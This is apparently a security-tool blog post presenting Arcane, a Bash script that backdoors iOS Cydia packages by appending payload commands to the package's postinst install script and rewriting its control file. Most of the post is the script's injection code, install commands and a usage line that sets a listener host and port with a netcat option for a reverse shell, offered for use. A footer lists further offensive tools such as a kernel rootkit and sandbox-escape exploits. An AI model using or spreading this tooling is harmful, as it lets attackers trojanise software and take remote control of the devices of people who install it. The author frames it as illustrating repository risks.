Arcane : A Simple Script Designed To Backdoor iOS Packages

Arcane is a simple script designed to backdoor iOS packages (iphone-arm) and create the necessary resources for APT repositories. It was created for this publication to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.

How Arcane Works?

To understand what’s happening in the GIF, decompress a package created with Arcane.

dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp

Notice the control and postinst files in the DEBIAN directory. Both files are important.

tree /tmp/whois-decomp/

/tmp/whois-decomp/

├── DEBIAN
│ ├── control
│ └── postinst
└── usr
└── bin
└── whois

It’s possible to supply scripts as part of a package when installing or removing applications. Package maintainer scripts include the preinst, postinst, prerm, and postrm files. Arcane takes advantage of the postinst file to execute commands during the installation.

#The “post-installation” file. This file is generally responsible for executing commands on the OS after installing the required files. It’s utilized by developers to manage and maintain various aspects of an installation. Arcane abuses this functionality by appending malicious Bash commands to the file.
postinst=”$tmp/DEBIAN/postinst”;
#A function to handle the type of command execution embedded into the postinst file.
function inject_backdoor ()
{
# If –file is used, cat the command(s) into the postinst file.
if [[ “$infile” ]]; then
cat “$infile” >> “$postinst”;
embed=”[$infile]”;
else
# If no –file, utilize the simple Bash payload, previously
# defined.
echo -e “$payload” >> “$postinst”;
embed=”generic shell command”;
fi;
status “embedded $embed into postinst” “error embedding backdoor”;
chmod 0755 “$postinst”
};

The control file contains values that package management tools use when installing packages. Arcane will either modify an existing control or create it.

#The “control” file template. Most iOS packages will include a control file. In the event one is not found, Arcane will use the below template. The $hacker variable is used here to occupy various arbitrary fields.
#https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp=”Package: com.$hacker.backdoor
Name: $hacker backdoor
Version: 1337
Section: app
Architecture: iphoneos-arm
Description: A backdoored iOS package
Author: $hacker https://$hacker.github.io/
Maintainer: $hacker https://$hacker.github.io/“;
…………..
#An if statement to check for the control file.
if [[ ! -f “$tmp/DEBIAN/control” ]]; then
# If no control is detected, create it using the template.
echo “$controlTemp” > “$tmp/DEBIAN/control”;
status “created control file” “error with control template”;
else
# If a control file exists, Arcane will simply rename the package
# as it appears in the list of available Cydia applications. This
# makes the package easier to location in Cydia.
msg “detected control file” succ;
sed -i ‘0,/^Name:.*/s//Name: $hacker backdoor/’ “$tmp/DEBIAN/control”;
status “modified control file” “error with control”;
fi;

Usage

Clone the repository in Kali v2020.3.

#sudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependencies
#sudo git clone https://github.com/tokyoneon/arcane /opt/arcane
#sudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcane
#chmod +x arcane.sh;./arcane.sh –help

Embed a command into a given package. See article for more info.

./arcane.sh –input samples/sed_4.5-1_iphoneos-arm.deb –lhost –lport <4444> –cydia –netcat

Package Samples

The repo includes packages for testing.

#ls -la samples/

#-rw-r–r– 1 root root 100748 Jul 17 18:39 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
#-rw-r–r– 1 root root 142520 Jul 22 06:21 network-cmds_543-1_iphoneos-arm.deb
#-rw-r–r– 1 root root 76688 Aug 29 2018 sed_4.5-1_iphoneos-arm.deb
#-rw-r–r– 1 root root 60866 Jul 8 21:03 top_39-2_iphoneos-arm.deb
#-rw-r–r– 1 root root 13810 Aug 29 2018 whois_5.3.2-1_iphoneos-arm.deb

MD5 sums, as found on the official Bingner repository.

#md5sum samples/*.deb

#3f1712964701580b3f018305a55e217c samples/libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
#795ccf9c6d53dd60d2f74f7a601f474f samples/network-cmds_543-1_iphoneos-arm.deb
#a020882dac121afa4b03c63304d729b0 samples/sed_4.5-1_iphoneos-arm.deb
#38db275007a331e7ff8899ea22261dc7 samples/top_39-2_iphoneos-arm.deb
#b40ee800b72bbac323568b36ad67bb16 samples/whois_5.3.2-1_iphoneos-arm.deb

R K

Recent Posts

Shadow-rs : Harnessing Rust’s Power For Kernel-Level Security Research

shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…

1 week ago

ExecutePeFromPngViaLNK – Advanced Execution Of Embedded PE Files via PNG And LNK

Extract and execute a PE embedded within a PNG file using an LNK file. The…

2 weeks ago

Red Team Certification – A Comprehensive Guide To Advancing In Cybersecurity Operations

Embark on the journey of becoming a certified Red Team professional with our definitive guide.…

3 weeks ago

CVE-2024-5836 / CVE-2024-6778 : Chromium Sandbox Escape via Extension Exploits

This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…

3 weeks ago

Rust BOFs – Unlocking New Potentials In Cobalt Strike

This took me like 4 days (+2 days for an update), but I got it…

3 weeks ago

MaLDAPtive – Pioneering LDAP SearchFilter Parsing And Security Framework

MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection. Its foundation is…

3 weeks ago